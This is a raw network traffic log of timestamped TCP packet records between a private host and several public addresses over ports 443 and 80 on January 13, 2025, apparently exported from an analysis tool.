                                                                  Jan 13, 2025 22:52:30.372334003 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372374058 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372410059 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372411966 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.372423887 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372442007 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.372478008 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372509003 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372554064 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.372560978 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.372602940 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.374744892 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.415155888 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.415163040 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.459193945 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.469577074 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469660997 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469701052 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469719887 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.469750881 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469811916 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469830036 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.469831944 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.469882011 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.469882011 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470015049 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470046997 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470057011 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470094919 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470108032 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470154047 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470191956 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470191956 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470208883 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470238924 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470257998 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470262051 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470273018 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470300913 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470319033 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470364094 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470365047 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470379114 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470407009 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470421076 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470473051 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470487118 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470652103 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470701933 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470751047 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470761061 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470772982 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470803022 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470818996 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470818996 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470838070 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470860958 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470865965 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470918894 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470930099 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.470942974 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470969915 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.470973969 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.471018076 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.471029997 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.471070051 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.471102953 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.471132994 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.471287012 CET49764443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.471329927 CET44349764104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.474759102 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.474811077 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.474884987 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.475055933 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.475070000 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.510827065 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.511035919 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.511065960 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.511384964 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.511706114 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.511775017 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.511826992 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.536191940 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:30.552114964 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.552145004 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.579349041 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:30.624615908 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.624716043 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.624805927 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.625046015 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.625066996 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.656133890 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.656197071 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.656608105 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.657102108 CET49766443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:30.657131910 CET44349766104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.660164118 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.660209894 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.660439014 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.660614967 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.660644054 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.662842035 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:30.662929058 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:30.662987947 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:30.664700985 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:30.664715052 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:30.671452045 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:30.671489000 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:30.671582937 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:30.671749115 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:30.671763897 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:30.936563015 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.936893940 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.936927080 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.937387943 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.937700987 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.937792063 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.937813997 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:30.979340076 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:30.992461920 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.085832119 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.085887909 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.085939884 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.085994005 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.086015940 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.086033106 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.086085081 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.086149931 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.086155891 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.086175919 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.086211920 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.086816072 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.087064981 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.087080002 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.103822947 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.104023933 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.104088068 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.105196953 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.105509996 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.105622053 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.105629921 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.105664968 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.105726004 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.123876095 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.124082088 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.124145985 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.124466896 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.124752045 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.124892950 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.124958038 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.133028984 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.133061886 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.139925957 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.140108109 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.140129089 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.141746044 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.141804934 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.142663956 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.142748117 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.142828941 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.142836094 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.148367882 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.171329021 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.173341036 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.173388958 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.173418999 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.173487902 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.173517942 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.173551083 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.173576117 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.173857927 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174084902 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174120903 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174141884 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.174159050 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174209118 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.174648046 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174714088 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174747944 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174762011 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.174777031 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.174828053 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.174841881 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.175568104 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.175606966 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.175620079 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.175635099 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.175683022 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.175697088 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176390886 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176431894 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176445007 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.176459074 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176502943 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176515102 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.176528931 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.176577091 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.178076029 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.179135084 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.194447994 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.225106001 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.260684013 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260760069 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260797024 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260812998 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.260833025 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260880947 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260895014 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.260907888 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260960102 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.260962963 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.260979891 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261018038 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.261291981 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261331081 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261346102 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.261358023 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261380911 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261384010 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.261419058 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261432886 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.261445045 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.261471987 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.262039900 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.262093067 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.262103081 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.262115002 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.262136936 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.262161016 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.262202978 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.262212992 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.262278080 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263017893 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263067007 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263093948 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263119936 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263139009 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263143063 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263174057 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263178110 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263191938 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263204098 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263237953 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263808966 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263843060 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263868093 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263880014 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.263906956 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.263923883 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.265150070 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.265271902 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.265316963 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.265362978 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.265379906 CET4434977135.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.265391111 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.265424013 CET49771443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.265872002 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.265933990 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.266005993 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.266254902 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.266280890 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.272582054 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.272639990 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.272695065 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.274399042 CET49770443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.274416924 CET44349770104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279062033 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279119015 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279160976 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279161930 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.279189110 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279225111 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.279234886 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279655933 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279691935 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279700994 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.279710054 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.279753923 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.279982090 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.283807039 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.283843040 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.283853054 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.283863068 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.283898115 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.348529100 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348576069 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348608017 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.348617077 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348630905 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348649979 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.348671913 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.348683119 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348725080 CET44349768104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.348784924 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.348784924 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.348819971 CET49768443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.369421005 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369492054 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369528055 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369529963 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.369550943 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369589090 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.369759083 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369817972 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369853020 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369856119 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.369868040 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.369899035 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.370379925 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.370466948 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.370501041 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.370502949 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.370513916 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.370562077 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.370568991 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371388912 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371429920 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371433973 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.371448994 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371483088 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.371490002 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371526003 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.371555090 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.371561050 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372241020 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372277021 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372282028 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.372292995 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372334003 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372349024 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.372356892 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.372390985 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.439929008 CET4972380192.168.2.4199.232.214.172
